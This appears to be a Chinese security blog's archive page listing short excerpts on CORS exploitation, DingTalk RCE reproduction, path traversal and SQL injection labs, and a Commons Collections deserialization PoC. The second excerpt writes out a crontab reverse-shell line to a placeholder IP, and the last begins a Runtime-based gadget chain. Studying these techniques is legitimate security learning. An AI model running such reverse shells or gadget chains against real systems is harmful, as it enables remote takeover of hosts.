02 2022 档案
摘要:有一直在写cors漏洞,但是一直没有去真正的利用他,今天就来学习记录一下利用。 0x01前置知识 就简单提一下 Access-Control-Allow-Origin: 可以写出哪些域名能访问本站的资源 Access-Control-Allow-Credentials:字段不是必选字段,它的值是一个
阅读全文
摘要:反弹shell 格式问题 在写计划任务反弹shell的时候VPS如果是centos那么直接写 */1 * * * * root bash -i >& /dev/tcp/IP/666 0>&1 但是在实际测试中debian和ubuntu系统这样写是执行不了的, 需要加上 bash -c " " */1
阅读全文
摘要:前几天爆出来钉钉RCE的漏洞,说一下发现和复现过程 0x01 爱之初体验 最开始是发现可以ssrf,当时电脑上就有dingding 然后试了一下 dnslog有回显,可以去访问 这两个IP一查 都是阿里云的服务器 payload是这样的,发送到聊天窗口,服务器就会去解析 dingtalk://din
阅读全文
摘要:任意文件读取 漏洞url在: http://localhost:7869/path_traversal/vul?filepath=e:/flag.txt 可以直接访问到flag文件 来看看vul此处的代码 这里是调用getImgBase64方法 跟进这个方法 可以看到仅仅判断了改路径是否存在和不是目
阅读全文
摘要:先来看看这个靶场sql注入的位置 简单的一个闭合单引号就能探测出了注入 那么来看看源码 可以看到jdbc_sqli_vul函数直接传入的username就拼接到了sql中,然后取执行返回信息,没有做任何防护。 jdbc_sqli_sec 再来看看安全的查询函数 这里用到了PreparedStatem
阅读全文
摘要:在cc1链中的poc有着这样一段 Transformer[] transformers = new Transformer[] { //通过ConstantTransformer类的transform方法获取一个对象类型 new ConstantTransformer(Runtime.class),
阅读全文